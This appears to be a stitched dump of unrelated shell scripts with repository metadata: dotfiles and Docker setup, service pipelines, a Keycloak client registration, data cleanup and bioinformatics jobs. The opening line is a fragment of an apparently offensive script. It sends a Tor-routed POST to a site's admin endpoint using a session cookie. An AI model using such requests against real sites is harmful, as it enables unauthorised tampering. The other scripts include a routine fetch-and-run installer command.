timeout 10 torify curl -s --cookie "PHPSESSID=$cookie" -X POST "$1/admin/RevertWebsiteLogo.php" --data "revertLogo=Envoyer" >/dev/null
| true |
79ef27bfa7f1e0b9468bf37a238c3e34d5ce26ae | Shell | MubarakSULAYMAN/BashCrash | /weekends (2).sh | UTF-8 | 1,470 | 3.796875 | 4 | [] | no_license | #!/bin/bash
# Check if the file exists before it request to a download file
wget -c --spider http://www.bom.gov.au/climate/dwo/201905/text/IDCJDW6111.201905.csv
# "wget" is for a non interractive download i.e, you do not control the download process
# Move to your file directory, open it and select desired columns
awk -v OFS=" " -F"," '{print $2, $3, $4, $7}' /home/mubarak/Documents/IDCJDW6111.201905.csv | sort -n
# The awk program keeps columns 2,3,4,7 of the CSV; sort -n orders the
# result numerically; OFS/-F set the output/input separators.
#
# NOTE(review): below, $3/$4/$5 are this *script's* positional parameters,
# not awk fields — unless extra arguments are passed on the command line
# they are all empty and every comparison misbehaves. Also "[ $3 == $5]"
# is missing the space before "]", so that test always errors at runtime.
# This branch needs to read the awk output (e.g. via read) instead.
if [ $3 == $4 ] || [ $3 == $5]
then
    echo " "
elif [ $3 -gt $4 ] || [ $3 -gt $5 ]
then
    echo "not enjoyable"
elif [ $3 -lt $4 ] || [ $3 -lt $5 ]
then
    echo "enjoyable"
else
    echo " "
fi
# It should expect to receive lines on standard input, where each line contains two
# columns, separated by commas; the first column should be a date
# (in YYYY-MM-DD format), and the second either the word “unenjoyable” or
# “enjoyable”.
# For example:
# 2019-03-01,enjoyable
# 2019-03-02,unenjoyable
# 2019-03-03,enjoyable
# This means your scripts could be put in a pipeline, weekends.sh |
# weather_analyser.sh, to get a single line of output, either “supported” or
# “unsupported”. | true |
1eb8aa69905ef231f37e86a588fbb82b49273d00 | Shell | grierj/dotfiles | /bootstrap.sh | UTF-8 | 3,237 | 4.03125 | 4 | [] | no_license | #!/bin/bash
# Run from the repository root so the relative dotfile paths below resolve.
cd "$(dirname "$0")"
# PREFIX selects which dotfile directory (zsh/ or bash/) gets linked,
# based on the user's login shell.
if [[ "$SHELL" = */zsh ]]; then
  PREFIX="zsh"
else
  PREFIX="bash"
fi
function die() {
  # Print a fatal error and abort the whole script with status 1.
  # The old guard compared $0 — the script *name* — against 0, which is
  # always true, so the function already exited unconditionally; the broken
  # test is dropped and the message now goes to stderr where it belongs.
  echo "$@" >&2
  exit 1
}
# Fetch and run the oh-my-zsh installer unless $ZSH already points at an
# existing installation directory.
function installOhMyZsh {
  if [[ -z $ZSH ]] || [[ ! -d $ZSH ]]; then
    bash -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
  fi
}
# Capture the current git identity into the globals my_email/my_name;
# the end of the script only prompts for values that are still empty.
function gitStuff() {
  my_email=`git config --get user.email`
  my_name=`git config --get user.name`
}
function makeLink() {
  # Symlink $1 into $HOME under its basename, replacing any stale symlink
  # or pre-existing regular file/directory of the same name.
  # All expansions are now quoted so paths with spaces work, and the
  # helper variables are local instead of leaking into the script scope.
  local file="$1"
  local final_file filename homefile
  final_file=$(realpath "$file")
  filename=$(basename "$file")
  # Refuse degenerate names that would make the rm/ln below dangerous.
  if [[ "$filename" == "/" ]] || [[ "$filename" == "." ]] || [[ "$filename" == ".." ]] || [[ "$filename" == "" ]]; then
    die "Got '$filename' for linking, which you don't want, your script is busted"
  fi
  homefile="$HOME/$filename"
  # Drop an existing symlink that points somewhere other than our target.
  if [[ -h "$homefile" ]] && [[ "$(readlink -n "$homefile")" != "$final_file" ]]; then
    echo "$(readlink "$homefile") isn't the same as $final_file) removing link"
    rm "$homefile"
  fi
  if [[ ! -h "$homefile" ]]; then
    # A real file or directory is in the way: remove it before linking.
    if [[ -e "$homefile" ]] && [[ -e "$final_file" ]]; then
      rm -rf "$homefile"
    fi
    echo "Linking $final_file to $homefile"
    ln -s "$final_file" "$homefile"
  fi
}
# Link every dotfile from the chosen $PREFIX directory (bash/ or zsh/)
# into $HOME; .gitconfig is copied rather than linked — see comment below.
function doIt() {
  pushd $PREFIX
  # .[a-zA-Z0-9]* matches the dotfiles while skipping '.' and '..'.
  for dotfile in .[a-zA-Z0-9]*; do
    makeLink $PWD/$dotfile
  done
  popd
  # I don't want to check in whatever user/e-mail I am at the time because this leaks employer info
  cp .gitconfig ~/.gitconfig
}
function getVundle() {
  # Clone the Vundle plugin manager into ~/.vim/bundle/vundle
  # (no-op when it is already present).
  if [ ! -d ~/.vim/bundle/vundle ]; then
    if [ ! -d ~/.vim/bundle ]; then
      # -p also creates ~/.vim itself; the previous plain mkdir failed on
      # fresh machines where ~/.vim did not exist yet.
      mkdir -p ~/.vim/bundle || die "Can't make bundle directory for vim"
    fi
    cd ~/.vim/bundle
    git clone https://github.com/gmarik/Vundle.vim.git vundle
  fi
}
# When vundle is first installed, we don't have colors and so vim
# stops and asks for you to hit return
function commentColor() {
if [ -f ~/.vimrc ]; then
perl -pi -e 's#colorscheme#"colorscheme#' $(realpath ~/.vimrc)
fi
}
function uncommentColor() {
if [ -f ~/.vimrc ]; then
perl -pi -e 's#"colorscheme#colorscheme#' $(realpath ~/.vimrc)
fi
}
function BackUp() {
bud="dotbackup/$(date +%s)"
if [ ! -d $bud ]; then
mkdir -p ~/$bud
fi
for f in * .*; do
if [ -f ~/$f ]; then
rsync -avP ~/$f ~/$bud/
fi
done
}
# --- main flow ---------------------------------------------------------
# Read the current git identity first; only missing values are prompted
# for at the bottom.
gitStuff
if [[ "$PREFIX" = "zsh" ]]; then
  installOhMyZsh || die "Couldn't install oh my zsh, you'll have to do it manually"
fi
if [ "$1" == "--force" -o "$1" == "-f" ]; then
  echo "Skipping backup due to --force"
else
  BackUp || die "Couldn't backup old file, use --force to override"
fi
doIt || die "Something went terribly wrong installing your dotfiles"
unset doIt
unset BackUp
unset gitStuff
# NOTE(review): no makePlugin function is defined in this file; this unset
# looks like leftover from an older revision — confirm and remove.
unset makePlugin
if [[ "$PREFIX" = "zsh" ]]; then
  # can't source from in bash
  echo "#####################"
  echo "Run 'source ~/.zshrc'"
  echo "#####################"
else
  source ~/.bash_profile
fi
getVundle || die "Vundle failed to install"
unset getVundle
# Comment the colorscheme out so the headless vim run below doesn't stall
# on a missing-colorscheme prompt, then restore it afterwards.
commentColor
vim -c "BundleInstall" -c "q" -c "q"
uncommentColor
unset commentColor
unset uncommentColor
# Prompt for any git identity values gitStuff could not read.
IFS=''
if [ -z $my_email ]; then
  echo -n "Git E-mail? "
  read my_email
fi
git config --global user.email $my_email
if [ -z $my_name ]; then
  echo -n "Git Name? "
  read my_name
fi
git config --global user.name $my_name
| true |
80ed1c9cc43c0d4187f1efc53eec4b7a0f409f21 | Shell | zhangyuan/helpme | /docker/install-docker-on-debian.sh | UTF-8 | 788 | 2.765625 | 3 | [
"MIT"
] | permissive | #! /bin/bash
set -ex
# Remove any distro-packaged or older Docker first (|| true: absence is OK).
apt-get remove docker docker-engine docker.io containerd runc || true
apt-get update
apt-get install -y apt-transport-https ca-certificates curl gnupg
# Install Docker's signing key into a dedicated keyring file.
curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
# Register the Docker apt repository for this Debian release codename.
echo \
  "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
  $(lsb_release -cs) stable" | tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update
apt-get install -y docker-ce docker-ce-cli containerd.io
# Smoke-test the freshly installed daemon.
docker run hello-world
# Install a pinned docker-compose binary (v1.28.5) for this OS/arch.
curl -L "https://github.com/docker/compose/releases/download/1.28.5/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
| true |
4b27e43ca42181a4931e8ae3874d89e36d177352 | Shell | Shachafinho/brainstorm | /scripts/run-pipeline.sh | UTF-8 | 3,550 | 3.765625 | 4 | [] | no_license | #!/bin/bash
set -e
# Run from the repository root regardless of where the script is invoked.
cd "$(dirname "${BASH_SOURCE[0]}")/.."
# Shared docker object names, ports and in-container URLs used below.
NETWORK_NAME="my-net"
MQ_VOLUME_NAME="mq-vol"
MQ_VOLUME_TARGET="/workspace/mq_data"
DB_VOLUME_NAME="db-vol"
DB_VOLUME_TARGET="/workspace/db_data"
MQ_NAME="rabbitmq"
MQ_PORT=5672
MQ_URL="rabbitmq://$MQ_NAME:$MQ_PORT/"
DB_NAME="postgres"
DB_PORT=5432
DB_URL="postgresql://$DB_NAME:$DB_PORT/"
SERVER_PORT=8000
API_SERVER_PORT=5000
# One parser container is launched per topic listed here.
declare -a PARSERS=( \
    "user_information" \
    "snapshot" \
    "color_image" \
    "depth_image" \
    "feelings" \
    "pose" \
)
function build_container {
    # Build the image for one component: the Dockerfile lives under
    # containers/<name>/Dockerfile and the build context is the repo root.
    # local + quoting keep odd names from leaking or word-splitting.
    local container_name=$1
    (export DOCKER_BUILDKIT=1; docker build . \
        -t "$container_name" \
        -f "containers/$container_name/Dockerfile")
}
function is_up {
    # is_up <volume|network|container> <name> — succeed iff an object with
    # exactly that name exists ('tail -n +2' drops the header row of the
    # `docker ... ls` table; ^/$ anchor the name filter).
    local component=$1
    local component_name=$2
    [ -n "$(docker "$component" ls -f "name=^${component_name}\$" | tail -n +2)" ]
}
# Pre-build the two images every container below is based on.
build_container "postgres-builder"
build_container "brainstorm-builder"
echo "Setting up volumes"
if ! is_up volume $MQ_VOLUME_NAME; then
    docker volume create $MQ_VOLUME_NAME
fi
if ! is_up volume $DB_VOLUME_NAME; then
    docker volume create $DB_VOLUME_NAME
fi
echo "Setting up networks"
if ! is_up network $NETWORK_NAME; then
    docker network create $NETWORK_NAME
fi
echo "Setting up containers"
# Freshly started MQ/DB containers need a moment before dependents attach.
WAITING_REQUIRED=false
if ! is_up container $MQ_NAME; then
    echo "Running docker container: $MQ_NAME"
    docker run -d -p $MQ_PORT:$MQ_PORT --name $MQ_NAME --network $NETWORK_NAME rabbitmq
    WAITING_REQUIRED=true
fi
if ! is_up container $DB_NAME; then
    echo "Running docker container: $DB_NAME"
    docker run -d -p $DB_PORT:$DB_PORT \
        --name $DB_NAME \
        --network $NETWORK_NAME \
        --mount source=$DB_VOLUME_NAME,target=/var/lib/postgresql/data \
        postgres-builder
    WAITING_REQUIRED=true
fi
if [ "$WAITING_REQUIRED" = true ]; then
    echo "Waiting for containers to setup..."
    sleep 10
fi
if ! is_up container api_server; then
    echo "Running docker container: api_server"
    docker run -d -t -p $API_SERVER_PORT:$API_SERVER_PORT \
        --name api_server \
        --network $NETWORK_NAME \
        --mount source=$DB_VOLUME_NAME,target=$DB_VOLUME_TARGET \
        brainstorm-builder \
        python -m brainstorm.api run-server --host "0.0.0.0" --port $API_SERVER_PORT --database "$DB_URL"
fi
if ! is_up container saver; then
    echo "Running docker container: saver"
    docker run -d -t \
        --name saver \
        --network $NETWORK_NAME \
        --mount source=$MQ_VOLUME_NAME,target=$MQ_VOLUME_TARGET \
        --mount source=$DB_VOLUME_NAME,target=$DB_VOLUME_TARGET \
        brainstorm-builder \
        python -m brainstorm.saver run-saver "$DB_URL" "$MQ_URL"
fi
# One parser container per supported snapshot topic.
for parser_name in ${PARSERS[@]}; do
    PARSER_CONTAINER="parse_$parser_name"
    if ! is_up container $PARSER_CONTAINER; then
        echo "Running docker container: $PARSER_CONTAINER"
        docker run -d -t \
            --name $PARSER_CONTAINER \
            --network $NETWORK_NAME \
            --mount source=$MQ_VOLUME_NAME,target=$MQ_VOLUME_TARGET \
            brainstorm-builder \
            python -m brainstorm.parsers run-parser "$parser_name" "$MQ_URL"
    fi
done
if ! is_up container server; then
    echo "Running docker container: server"
    docker run -d -t -p $SERVER_PORT:$SERVER_PORT \
        --name server \
        --network $NETWORK_NAME \
        --mount source=$MQ_VOLUME_NAME,target=$MQ_VOLUME_TARGET \
        brainstorm-builder \
        python -m brainstorm.server run-server --host "0.0.0.0" --port $SERVER_PORT "$MQ_URL"
fi
| true |
823fade80875719e921bb3aa86dc8459a5632619 | Shell | retrievertech/seismogram-app | /data-tools/mongo-import.sh | UTF-8 | 864 | 2.734375 | 3 | [] | no_license | db=seismo && \
mongo $db --eval "db.dropDatabase()" && \
mongoimport --db=$db --collection=stations --jsonArray --file stations.json && \
mongoimport --db=$db --collection=files --jsonArray --file files.json && \
mongo $db --eval "db.files.ensureIndex({date:1})" && \
mongo $db --eval "db.files.ensureIndex({stationId:1})" && \
mongo $db --eval "db.files.ensureIndex({status:1})" && \
if [ "$1" != "dev" ]; then
files_with_metadata=`aws s3 ls "s3://wwssn-metadata/" --profile seismo | perl -e '@lines = <>; @lines = map { s/^.*PRE\s//; s/[\/\s]*$//; "\"$_\"" } @lines; print join ",", @lines'`
else
files_with_metadata=`ls -1 ../client/metadata | perl -e '@lines = <>; @lines = map { s/[\/\s]*$//; "\"$_\"" } @lines; print join ",", @lines'`
fi && \
mongo $db --eval 'db.files.update({name: {$in: ['$files_with_metadata']}}, {$set: {status:3}}, {multi:true})'
| true |
4303f8a0a945fec8c6601309dc858ad14fc3cb7b | Shell | zchee/zsh-default-completions | /src/Unix/Command/_gsettings | UTF-8 | 1,363 | 3.125 | 3 | [] | no_license | #compdef gsettings
local curcontext="$curcontext" state line expl ret=1
local subcmds
_arguments -A "-*" \
'(- 1 *)--version[show version information]' \
'--schemadir[specify location of schemata]:directory:_directories' \
':command:->subcmds' \
'*::args:->subargs' && ret=0
if [[ $state = subargs ]]; then
curcontext="${curcontext%:*}-$words[1]:"
case $words[1] in
help) state=subcmds;;
describe|get|range|reset|writable|monitor)
_arguments ':schema:->schemata' ':key:->keys'
;;
set)
_arguments ':schema:->schemata' ':key:->keys' ':value'
;;
(list|reset)-(keys|recursively|children)) state=schemata ;;
list-schemas)
_arguments '--print-paths'
;;
*) _default && ret=0 ;;
esac
fi
case $state in
subcmds)
subcmds=( ${(L)${${(M)${${(f)"$(_call_program commands $service help)"}[(r)Commands:*,-2]}:# *}#??}/ ##/:} )
_describe -t commands 'command' subcmds -M 'r:?|-=* r:|=*' && ret=0
state=''
;;
schemata)
if compset -P 1 '*:'; then
_directories && ret=0
else
_wanted schemata expl 'schema' compadd -M 'r:|.=* r:|=*' \
$(_call_program schemata $service list-schemas) && ret=0
fi
;;
keys)
_wanted keys expl 'key' compadd \
$(_call_program keys $service list-keys $words[CURRENT-1]) && ret=0
;;
esac
return ret
# vim:ft=zsh
| true |
eb114869bfac67903ef44b8c7a593056ed400433 | Shell | alex-aleyan/class03_comp_comm_networks | /project/run_client.sh | UTF-8 | 741 | 3.59375 | 4 | [] | no_license | #!/bin/bash
which wireshark sed awk make; if [[ $? -ne 0 ]]; then echo "install: wireshark, sed, awk, make"; fi
if [ "$?" -ne 0 ]; then cd $this_path; exit ; fi
this_path="$(pwd)"
echo $this_path
path_to_script="$( cd "$(dirname "${BASH_SOURCE[0]}")" ; pwd -P )"
echo $path_to_script
server_path="${path_to_script}/sw/server"
client_path="${path_to_script}/sw/client"
data_file0="file0.txt"
dest_file="file.txt"
cd $client_path
if [ "$?" -ne 0 ]; then cd $this_path; exit ; fi
rm $dest_file
make all
if [ "$?" -ne 0 ]; then cd $this_path; exit ; fi
# create 10 files from "data_file0"
if test -f "$data_file0"; then echo "$data_file0 exist"; fi
./duplicate_file0.sh
cd $client_path;
$(cat README.txt)
cat $dest_file
cd $this_path
| true |
503a7c277b75bdf824797e8f1b9227c559489f4b | Shell | rhysecampbell/cloud-infra | /ansible/roles/dqmfeed/files/error-scripts/oldResultCleanup.sh | UTF-8 | 346 | 2.703125 | 3 | [] | no_license | #!/bin/sh
# clean up the DQM logs older than 1 week old
for i in `find /var/www/html/error-scripts/results -maxdepth 1 -mtime +7`; do
rm -rf $i
done
for i in `find /var/www/html/error-scripts/errorsBySite -maxdepth 1 -mtime +7`; do
rm -rf $i
done
for i in `find /var/www/html/error-scripts/errorLogs -maxdepth 1 -mtime +7`; do
rm -rf $i
done
| true |
ebbd77f9fa73674ded672c4a9778ec9c0c5e9925 | Shell | ashleydev/oh-my-zsh | /themes/sorin.zsh-theme | UTF-8 | 2,217 | 2.984375 | 3 | [] | no_license | # ------------------------------------------------------------------------------
# FILE: sorin.zsh-theme
# DESCRIPTION: oh-my-zsh theme file.
# AUTHOR: Sorin Ionescu (sorin.ionescu@gmail.com)
# VERSION: 1.0.4
# SCREENSHOT: http://i.imgur.com/aipDQ.png
# ------------------------------------------------------------------------------
# Color escape sequences, wrapped in %{...%} so zsh excludes them from
# prompt-width calculations.  Set DISABLE_COLORS=true for a plain prompt.
if [[ "$DISABLE_COLORS" != "true" ]]; then
    local R="%{$terminfo[sgr0]%}"
    local MAGENTA="%{$fg[magenta]%}"
    local YELLOW="%{$fg[yellow]%}"
    local GREEN="%{$fg[green]%}"
    local B_GREEN="%{$fg_bold[green]%}"
    local BLUE="%{$fg[blue]%}"
    local CYAN="%{$fg[cyan]%}"
    local RED="%{$fg[red]%}"
    local B_RED="%{$fg_bold[red]%}"
fi
# Indicator shown by vi-mode plugins while the command line is in normal mode.
MODE_INDICATOR="$B_RED❮$R$RED❮❮$R"
# %(?..⏎): render a return glyph only when the last command failed.
local return_status="$RED%(?..⏎)$R"
# Single quotes defer expansion to prompt-render time (presumably relies
# on PROMPT_SUBST being enabled by the framework — confirm).  The
# GIT_PROMPT_INFO / GIT_RPROMPT_INFO variables are maintained by
# git_prompt_info below.
PROMPT='$CYAN%c$GIT_PROMPT_INFO %(!.$B_RED#.$B_GREEN❯)$R '
RPROMPT='${return_status}$GIT_RPROMPT_INFO$R'
git_prompt_info ()
{
  # Refresh GIT_PROMPT_INFO (left prompt) and GIT_RPROMPT_INFO (right
  # prompt) using the git_prompt__* helper functions.  Outside a git
  # work tree both variables are cleared.
  if [ -z "$(git_prompt__git_dir)" ]; then
    GIT_PROMPT_INFO=''
    GIT_RPROMPT_INFO=''
    return
  fi
  # Branch name plus any in-progress rebase marker.
  local ref
  git_prompt__branch
  ref="$GIT_PROMPT_BRANCH"
  git_prompt__rebase_info
  ref="${ref}$GIT_PROMPT_REBASE_INFO"
  GIT_PROMPT_INFO=" ${BLUE}git$R:$RED${ref}$R"
  # Right prompt: one colored glyph per dirty-state flag, appended in a
  # fixed order (both "modified" flags intentionally share the ✹ glyph).
  local glyphs=''
  git_prompt__dirty_state
  [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_ADDED" = 'yes' ]] && glyphs="${glyphs}$GREEN ✚"
  [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_MODIFIED" = 'yes' ]] && glyphs="${glyphs}$BLUE ✹"
  [[ "$GIT_PROMPT_DIRTY_STATE_WORKTREE_MODIFIED" = 'yes' ]] && glyphs="${glyphs}$BLUE ✹"
  [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_DELETED" = 'yes' ]] && glyphs="${glyphs}$RED ✖"
  [[ "$GIT_PROMPT_DIRTY_STATE_WORKTREE_DELETED" = 'yes' ]] && glyphs="${glyphs}$RED ✖"
  [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_RENAMED" = 'yes' ]] && glyphs="${glyphs}$MAGENTA ➜"
  [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_UNMERGED" = 'yes' ]] && glyphs="${glyphs}$YELLOW ═"
  [[ "$GIT_PROMPT_DIRTY_STATE_WORKTREE_UNTRACKED" = 'yes' ]] && glyphs="${glyphs}$CYAN ✭"
  GIT_RPROMPT_INFO=$glyphs
}
| true |
6e57bb50eec48cd9a34337a5d39ea51fbbcb41b7 | Shell | bigklopp/Shell_git | /isting.sh | UTF-8 | 153 | 3.21875 | 3 | [] | no_license | #!/bin/bash
# Ask for confirmation: Enter or any answer beginning with y/Y means "run".
read -p "실행할까요? (y/n)" CHOICE
case $CHOICE in
	[yY]*|"")
		echo "실행됨"
		;;
	*)
		echo "실행 취소됨"
		;;
esac
| true |
b300c29cf5ac71f7d2bd6c38801da917804f5ce1 | Shell | jgresty/peak-cart | /setup_auth.sh | UTF-8 | 2,122 | 3.234375 | 3 | [] | no_license | #!/bin/sh
# Register the "peak-cart" confidential client with a local Keycloak,
# export the realm's RS256 signing certificate to cert.pem, and print
# ready-to-paste commands for fetching a JWT as the new client.
# Requires curl and jq; assumes Keycloak admin credentials admin/admin.
#
# BUG FIX: the original `set -e pipefail` only enabled -e and assigned
# the word "pipefail" to $1; `-o` is required to enable the option.
# pipefail is enabled conditionally because some /bin/sh lack it.
set -e
if (set -o pipefail) 2>/dev/null; then set -o pipefail; fi
KEYCLOAK="http://localhost:8080"
REALM="master"
# Client definition posted to the admin API; the fixed UUID is reused
# below to fetch the generated client secret.
CLIENT='{
    "id": "1f9e3fcd-287c-45cf-9018-594d4406cd23",
    "clientId": "peak-cart",
    "enabled": true,
    "directAccessGrantsEnabled": true,
    "standardFlowEnabled": false,
    "publicClient": false,
    "attributes": {
        "access.token.signed.response.alg": "RS256"
    }
}'
REGISTER_URL="$KEYCLOAK/auth/admin/realms/$REALM/clients/"
TOKEN_URL="$KEYCLOAK/auth/realms/$REALM/protocol/openid-connect/token"
echo "Getting access token"
# BUG FIX: the -H value was missing the "Content-Type:" header name, so
# curl ignored it (the request still worked because --data-urlencode
# sets this content type by default).
TOKEN=$(curl -X POST -s \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode "client_id=admin-cli"\
    --data-urlencode "grant_type=password"\
    --data-urlencode "username=admin"\
    --data-urlencode "password=admin"\
    "$TOKEN_URL" | jq -r .access_token)
echo "Creating client peak-cart"
curl -X POST \
    -d "$CLIENT" \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    "$REGISTER_URL"
# Wrap the realm's RS256 x5c certificate in PEM armor.
echo "Writing public certificate to cert.pem"
echo "-----BEGIN CERTIFICATE-----" > cert.pem
curl -s "$KEYCLOAK/auth/realms/$REALM/protocol/openid-connect/certs" \
    | jq -r '.keys[] | select (.alg == "RS256") | .x5c[0]' >> cert.pem
echo "-----END CERTIFICATE-----" >> cert.pem
echo "Getting client secret"
SECRET=$(curl -s \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    "$KEYCLOAK/auth/admin/realms/$REALM/clients/1f9e3fcd-287c-45cf-9018-594d4406cd23/client-secret" \
    | jq -r .value)
echo
echo "SUCCESS"
echo
echo "Fetch new JWT with:"
# Unquoted EOF: $KEYCLOAK and $SECRET expand now; \$ and \\ keep the
# printed snippet's own substitutions/continuations literal.
cat << EOF
TOKEN=\$(curl -s -L -X POST '$KEYCLOAK/auth/realms/master/protocol/openid-connect/token' \\
    -H 'Content-Type: application/x-www-form-urlencoded' \\
    --data-urlencode 'client_id=peak-cart' \\
    --data-urlencode 'grant_type=password' \\
    --data-urlencode 'client_secret=$SECRET' \\
    --data-urlencode 'scope=openid' \\
    --data-urlencode 'username=admin' \\
    --data-urlencode 'password=admin' | jq -r '.access_token')
EOF
echo "Then query the application with:"
echo 'curl -H "Authorization: Bearer ${TOKEN}" localhost:3000'
| true |
27e3c8b63b4c4f9446659207ed63ca9869b3419b | Shell | jambo6/dotfiles | /zshrc/base_aliases.zsh | UTF-8 | 1,135 | 2.96875 | 3 | [] | no_license | # Alias some bash scripts
# Helper scripts and common tool shortcuts from the monorepo.
alias pyproject="~/monorepo/dotfiles/scripts/pyproject/pyproject.sh"
alias poetryreq="poetry export -f requirements.txt --output requirements.txt"
# Easy peasy: nicer drop-in replacements.
alias psql="pgcli"
alias vim="nvim"
# Colored ls (-G is the BSD/macOS color flag).
alias ls='ls -G'
# Confirms: prompt before destructive file operations.
# NOTE(review): alias names containing spaces ('rm -f' etc.) never match
# during command lookup, so those three lines have no effect — the plain
# `rm` alias already covers them. Confirm before removing.
alias rm='rm -i'
alias 'rm -f'='rm -f -i'
alias 'rm -r'='rm -r -i'
alias 'rm -rf'='rm -rf -i'
alias cp='cp -i'
alias mv='mv -i'
# Fast access to frequently used directories and config files.
alias m="cd ~/monorepo"
alias dotfiles="cd ~/monorepo/dotfiles"
alias zshrc="cd ~/monorepo/dotfiles/zshrc"
alias srczsh="source ~/.zshrc"
alias gitconfig="vim ~/.gitconfig"
alias initvim="vim ~/.config/nvim/init.vim"
alias scripts="cd ~/monorepo/dotfiles/scripts"
alias psqlrc="vim ~/.psqlrc"
alias pgpass="vim ~/.pgpass"
# Some useful shortcuts
alias -- -="cd -"
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias .....="cd ../../../../"
alias ......="cd ../../../../../"
alias myip="curl ifconfig.me"
alias del="trash"
alias activate="conda activate ./env"
# Make a directory (and any missing parents) and cd into it.
# All arguments are joined into a single path ("$*"), preserving the
# original behavior; `--` guards against names starting with "-", and
# cd now only runs when mkdir succeeded (previously it ran regardless).
mkcd() {
    mkdir -p -- "$*" && cd -- "$*"
}
# Python: list and kill running interpreters.
# NOTE(review): pkill -9 (SIGKILL) gives processes no chance to clean
# up; consider trying a plain `pkill python` (SIGTERM) first.
alias checkpython="ps -ef | grep python"
alias killpython="pkill -9 python"
| true |
c25f9327fa00acfaab205d3f2806c42ac19cc585 | Shell | kosmos-industrie40/kosmos-local-mqtt-broker | /mqtt-dashboard/entrypoint.sh | UTF-8 | 534 | 3.25 | 3 | [] | no_license | #!/bin/bash
# entrypoint.sh
#
# Required environment variables
# For the broker itself:
# * USE_TLS - should the broker start with SSL/TLS?
#
# For the PKI (when TLS is enabled):
# * MY_PKI_URI - the full URI of the Vault PKI
# * VAULT_TOKEN - the Vault token used to obtain certificates
#
if [ "$USE_TLS" = true ]; then
    # The certificate CN is derived from the domain name plus hostname.
    export MY_FQDN=`hostname -f`
    . /app/common/request_cert.sh
fi
npm start -- --userDir /app | true |
3eb54bda2621ff02c29b6fd3b264b91590f95a2b | Shell | rohan19980/Rna-Seq | /StringTie_postprocess.sh | UTF-8 | 1,714 | 2.71875 | 3 | [] | no_license | #! /usr/bin/env bash
#SBATCH --cpus-per-task=1
#SBATCH --mem-per-cpu=2000M
#SBATCH --time=00:10:00
#SBATCH --job-name=StringTie
#SBATCH --mail-user=antoine.girardin@students.unibe.ch
#SBATCH --mail-type=begin,end
#SBATCH --output=/data/users/agirardin/output/output_StringTie_%j.o
#SBATCH --error=/data/users/agirardin/error/error_StringTie_%j.e
# Post-process a StringTie meta-assembly GTF: split transcript records
# into annotated / novel / unannotated sets and derive summary stats.
# Field positions ($3 feature, $5-$4 length, $10/$12/$13/$14 attribute
# tokens) assume the standard GTF attribute layout — confirm.
cd StringTie
# Keep only transcript records (drop exon lines etc.).
awk '{if($3=="transcript"){print $0}}' meta-assembly.gtf > meta-assembly_transcripts.gtf
# Transcripts whose first attribute value is a StringTie MSTRG id.
awk '{if($10~ /MSTRG/){print $0}}' meta-assembly_transcripts.gtf > meta-assembly_noveltranscripts.gtf
# Of those, keep the ones that still carry a reference "gene" attribute.
awk '{if($13~ /gene/){print $0}}' meta-assembly_noveltranscripts.gtf > meta-assembly_notannotatedtranscripts.gtf
# NOTE(review): this overwrites meta-assembly_noveltranscripts.gtf built
# two steps above (after it has been consumed) — apparently intentional.
awk '{if($13 !~ /gene/){print $0}}' meta-assembly_transcripts.gtf > meta-assembly_noveltranscripts.gtf
# Transcripts assigned to an Ensembl (ENSG) gene id.
awk '{if($10~ /ENSG/){print $0}}' meta-assembly_transcripts.gtf > meta-assembly_annotatedtranscripts.gtf
# Count annotated transcripts per gene attribute value.
awk '{print $14}' meta-assembly_annotatedtranscripts.gtf | sort | uniq -c > meta-assembly_annotatedgenes.txt
# Line counts of each derived file -> summary table.
wc -l meta-assembly_transcripts.gtf > meta-assembly_summary.csv
wc -l meta-assembly_annotatedtranscripts.gtf >> meta-assembly_summary.csv
wc -l meta-assembly_noveltranscripts.gtf >> meta-assembly_summary.csv
wc -l meta-assembly_notannotatedtranscripts.gtf >> meta-assembly_summary.csv
wc -l meta-assembly_annotatedgenes.txt >> meta-assembly_summary.csv
# Per transcript: exon count, transcript length ($5-$4), transcript id.
awk 'BEGIN{k=""}{if($3=="transcript"){print i,j,k; i=0; j=$5-$4; k=$12}if($3=="exon"){i+=1}}END{print i,j,k}' meta-assembly.gtf > meta-assembly_count.csv
# Drop the empty first record, then strip quotes/semicolons from ids.
sed -i '1d' meta-assembly_count.csv
sed -i -e 's/\"//g' meta-assembly_count.csv
sed -i -e 's/;//g' meta-assembly_count.csv
# Totals: transcript count, exon total, single-exon transcript count.
awk 'BEGIN{i=j=k=0}{i+=1;j+=$1;if($1==1){k+=1}}END{print i,",",j,",",k}' meta-assembly_count.csv > meta-assembly_summary1.csv
| true |
a3f34b9b2a1141c13260b8bf3632746c0192a253 | Shell | knowtorious/CentosSystemChangeProfile | /change-profile-script/bin/change-profile | UTF-8 | 1,492 | 3.359375 | 3 | [] | no_license | #!/bin/sh
# Reconfigure a CentOS system (static network, DNS, NTP, hostname,
# default runlevel) from values defined in /root/config-profile.
# Originals of each edited file are kept as hidden ".X-orig" backups.
# NOTE(review): the shebang is /bin/sh but [[ ]] and `source` are
# bashisms; this relies on /bin/sh being bash (true on CentOS).
NOARGS=65     # NOTE(review): defined but never used
NOTFOUND=66   # exit code: config profile missing
# Load DEVICE/IPADDR/NETMASK/GATEWAY/SEARCH/NAMESERVER/NTP1/NTP2/HOSTNAME.
if [[ -f /root/config-profile ]]
then
   source /root/config-profile
else
   echo "/root/config-profile file not found."
   exit $NOTFOUND
fi
# '.' (hidden files) ensures that this file will not be loaded
# Backup ifcfg-eth0 as .ifcfg-eth0-orig, then write a static config.
cp -p /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/.ifcfg-eth0-orig
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<- EOF
